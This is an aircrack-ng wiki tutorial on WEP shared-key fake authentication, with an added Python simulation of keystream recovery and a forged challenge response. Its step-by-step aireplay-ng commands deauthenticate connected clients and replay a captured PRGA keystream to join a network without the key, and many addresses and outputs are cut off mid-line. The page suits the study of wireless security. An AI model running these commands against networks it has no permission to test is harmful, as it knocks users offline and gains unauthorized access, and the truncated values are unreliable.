spanish_shared_key
spanish_shared_key, revision 2007/02/25 16:48 (created by spanish); current revision 2009/08/14 18:21 by mister_x
====== Tutorial: How to do a fake authentication with a shared key ======
Version: 1.01 February 15, 2007 (changes at the end of the text) \\
By: darkAudax

===== Introduction =====

This tutorial covers the situation in which you get the following error message when you try to do a [[fake_authentication|fake authentication]] with [[aireplay-ng]]:

  
  
  

This tutorial is about WEP authentication, so it is important to understand what we are doing.

It is recommended that you experiment with your own access point to become familiar with these ideas and techniques. If the access point is not yours, remember that you must ask its owner for permission before practising or playing with it.

First of all I would like to thank [[http://

Please send me any question or suggestion, positive or negative. Problems you run into, ideas or tricks are welcome.


===== Assumptions =====

This solution assumes that:
  * You are using drivers patched to support injection. You can sniff packets with [[http://
  * You are physically close enough to send and receive access point packets.
  * You are using v0.7 of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change "

===== Equipment used =====

In this tutorial, here is what was used:

  * MAC address of PC running aircrack-ng suite: 00:
  * BSSID (MAC address of access point): 00:
  * ESSID (Wireless network name): teddy
  * Access point channel: 9
  * Wireless interface: ath0
  * MAC address of a client successfully associated with the access point: 00:

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.

===== Solution =====

==== Solution Background ====

An access point must authenticate a station before the station can associate with the access point or communicate with the network. The IEEE 802.11 standard defines two types of WEP authentication:

  * Open System Authentication allows any device to join the network, assuming that the device SSID matches the access point SSID. Alternatively,

  * Shared Key Authentication requires that the station and the access point have the same WEP key to authenticate.

We will be dealing with the shared key authentication.

==== Solution Overview ====

In order to do a shared key fake authentication,

Here are the basic steps we will be going through:

  - Start the wireless interface in monitor mode on the specific AP channel
  - Start airodump-ng on AP channel with filter for bssid to collect the PRGA xor file
  - Deauthenticate a connected client
  - Perform shared key fake authentication
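The handshake behind the steps above, as an added example written for this page (Python; it is not the tutorial's own code and not aircrack-ng code): the AP sends a clear-text challenge, a legitimate client returns it WEP-encrypted, and an eavesdropper who has both frames XORs the known plaintext against the ciphertext to obtain the keystream (PRGA) for that IV, which is what the xor file holds. The same keystream under the same IV then answers any later challenge without ever knowing the key. The frame layout is simplified (an assumption): a frame is just the 3-byte IV followed by the RC4-encrypted body and ICV, with no 802.11 header or key-ID byte; the 40-bit WEP key is constructed. The example also runs the two failure modes a practitioner meets in the field: a keystream taken under a different IV, and a keystream too short to cover the 140 bytes of body plus ICV, which is why Step 4 insists on a minimum PRGA length.

```python
"""Shared-key (WEP) authentication and keystream (PRGA) recovery.

Added example for this tutorial, not aircrack-ng code. Assumption: a frame is
just IV || RC4(body || ICV), without the 802.11 MAC header or key-ID byte;
RC4 over (IV || key) and the CRC-32 ICV are the real WEP construction.
"""
import os
import struct
import zlib

CHALLENGE_LEN = 128  # the challenge text element carries 128 bytes


def rc4(key: bytes, length: int) -> bytes:
    """Plain RC4 keystream generator: `length` bytes for `key`."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def icv(body: bytes) -> bytes:
    """WEP integrity check value: little-endian CRC-32 of the body."""
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, body: bytes) -> bytes:
    plain = body + icv(body)
    return iv + xor(plain, rc4(iv + key, len(plain)))


def wep_decrypt(key: bytes, frame: bytes):
    """Body of `frame`, or None when the ICV does not verify."""
    iv, ct = frame[:3], frame[3:]
    plain = xor(ct, rc4(iv + key, len(ct)))
    return plain[:-4] if plain[-4:] == icv(plain[:-4]) else None


def auth_body(seq: int, challenge: bytes) -> bytes:
    """Auth frame body: algorithm 1 (shared key), sequence, status 0, challenge IE."""
    return struct.pack("<HHH", 1, seq, 0) + bytes([16, len(challenge)]) + challenge


class AccessPoint:
    def __init__(self, key: bytes):
        self.key, self.pending = key, b""

    def challenge(self) -> bytes:  # sequence 2: random challenge sent in the clear
        self.pending = os.urandom(CHALLENGE_LEN)
        return self.pending

    def verify(self, frame: bytes) -> bool:  # sequence 3: decrypt and compare
        return wep_decrypt(self.key, frame) == auth_body(3, self.pending)


def legit_response(key: bytes, challenge: bytes) -> bytes:
    """A real client encrypts the challenge under the shared key with a fresh IV."""
    return wep_encrypt(key, os.urandom(3), auth_body(3, challenge))


def recover_prga(challenge: bytes, response: bytes):
    """The sniffer knows the whole plaintext (the ICV too, CRC-32 is public), so
    plaintext XOR ciphertext is the keystream for that IV: the xor file contents."""
    body = auth_body(3, challenge)
    return response[:3], xor(body + icv(body), response[3:])


def fake_auth_response(iv: bytes, prga: bytes, challenge: bytes) -> bytes:
    """Shared-key fake authentication: reuse IV and keystream, never touching the key."""
    plain = auth_body(3, challenge)
    plain += icv(plain)
    if len(prga) < len(plain):
        raise ValueError(f"need {len(plain)} keystream bytes, have {len(prga)}")
    return iv + xor(plain, prga)


def demo() -> dict:
    key = b"\x01\x02\x03\x04\x05"  # constructed 40-bit WEP key; the attacker never sees it
    ap = AccessPoint(key)
    c1 = ap.challenge()                       # 1. a legitimate client authenticates
    r1 = legit_response(key, c1)
    legit_ok = ap.verify(r1)
    iv, prga = recover_prga(c1, r1)           #    ... while the attacker only sniffs
    fake_ok = ap.verify(fake_auth_response(iv, prga, ap.challenge()))  # 2. fresh challenge
    other_iv = xor(iv, b"\xff\xff\xff")       # 3. keystream is bound to its IV
    wrong_iv_ok = ap.verify(fake_auth_response(other_iv, prga, ap.challenge()))
    try:                                      # 4. too little keystream (the length tip)
        fake_auth_response(iv, prga[:100], ap.challenge())
        short_ok = True
    except ValueError:
        short_ok = False
    return {"legit_ok": legit_ok, "prga_len": len(prga), "fake_ok": fake_ok,
            "wrong_iv_ok": wrong_iv_ok, "short_prga_ok": short_ok}


if __name__ == "__main__":
    print(demo())
```

Running the file prints the verdicts from demo(): the legitimate client and the keyless attacker both pass, the attacker with the same keystream under a different IV fails, and a 100-byte keystream is refused before a frame is even built. The weakness is that the challenge is public and the response is a deterministic function of it, so one sniffed handshake leaks as many keystream bytes as the response frame is long. aireplay-ng's -y option feeds it exactly this kind of IV-plus-keystream material, and a keystream recovered by chopchop or fragmentation serves just as well as long as it covers the whole authentication frame.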


==== Step 1 - Start the wireless interface in monitor mode on AP channel ====

Enter the following command to start the wireless card on channel 9 in monitor mode:

  airmon-ng start wifi0 9

Note: In this command we use "

The system will respond:

  

  
  

You will notice that "

Then enter "

To confirm the interface is properly setup, enter "

The system will respond:

  

  

  

  
  
  Bit Rate:0 kb/s
  
  
  Power Management:
  Link Quality=0/
  Rx invalid nwid:
  Tx excessive retries:

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9, and the Access Point field shows the MAC address of your wireless card. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out:
http://

=== Troubleshooting Tips ===

  * If another interface started other than ath0 then you can use that one or use "


==== Step 2 - Start airodump-ng ====

Open another console session to capture the PRGA xor file. Then enter:

  airodump-ng -c 9 --bssid 00:

Where:
  * -c 9 is the channel for the wireless network
  * --bssid 00:
  * -w sharedkey is the file name prefix for the file which will contain the PRGA xor data.
  * ath0 is the interface name.

Beyond the error message shown in the introduction,

  CH  9 ][ Elapsed: 20 s ][ 2007-02-10 16:29

  BSSID              PWR RXQ  Beacons

  00:

  BSSID              STATION

  00:

Once "
  sharedkey-01-00-14-6C-7E-40-80.xor

The "

In real life, you will not likely be that lucky and happen to be sniffing when a wireless client associates with the access point yielding the PRGA xor file. To obtain the PRGA xor bit file, there are two basic methods:

  * The first is to be patient.
  * The second method is to [[deauthentication|deauthenticate]] a client to force it to associate again.


==== Step 3 - Deauthenticate a connected client ====

This step is only required if you do not have a PRGA xor file. You may also use the PRGA xor file obtained via a [[korek_chopchop|chopchop]] or [[fragmentation]] attack.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected.

  aireplay-ng -0 1 -a 00:

Where:
  * -0 means deauthentication
  * 1 is the number of deauths to send (you can send multiple if you wish)
  * -a 00:
  * -c 00:
  * ath0 is the interface name

Here is what the output looks like:

  

Prior to executing the command above, open another console and start airodump-ng in the same way as you did earlier "

Once you run the deauthentication command, see if airodump-ng has output the PRGA xor file. If not, try another deauthentication or against another client.

Once you have successfully obtained the PRGA xor file, proceed to the next step.

=== Troubleshooting Tips ===

  * Be sure you are physically close enough to send and receive access point packets.

==== Step 4 - Perform Shared Key Fake Authentication ====

Now that you have a PRGA xor file, you are ready to do the shared key fake authentication.

  aireplay-ng -1 0 -e teddy -y sharedkey-04-00-14-6C-7E-40-80.xor -a 00:

Where:
  * -1 means fake authentication
  * 0 means only authenticate once
  * -e teddy is the SSID of the network
  * -y sharedkey-04-00-14-6C-7E-40-80.xor is the name of the file containing the PRGA xor bits
  * -a 00:
  * -h 00:
  * ath0 is the interface name

Here is an example of a successful authentication:

  
  
  
  Code 0 - Authentication SUCCESSFUL :)
  
  Code 0 - Association SUCCESSFUL :)

If you receive the messages above, you are good to go forward with the standard injection techniques.

Here is an example of a failed authentication:

  
  
  
  
  
  
  and so on...

Here is another type of failure:

  
  
  
  Code 0 - Authentication SUCCESSFUL :)
  
  Not answering...(Step3)
  
  
  Not answering...(Step3)
  
  and so on...


=== Usage Tip ===

  * If you use a PRGA xor file obtained from a chopchop attack, be sure it is at least 144 bytes long. You need a minimum number of bits to successfully do the shared key fake authentication.

=== Troubleshooting Tips ===

  * If you received the "Part 1 authentication failure"
  * Some access points are configured to only allow selected MAC addresses to associate and connect.
  * Make sure you are physically close enough to the access point to inject packets.
  * If you received the "


===== Change Log =====
February 15/2007 v1.01
  * Incorporate feedback from cjaghblb

February 14/2007 v1.00
  * Initial Release
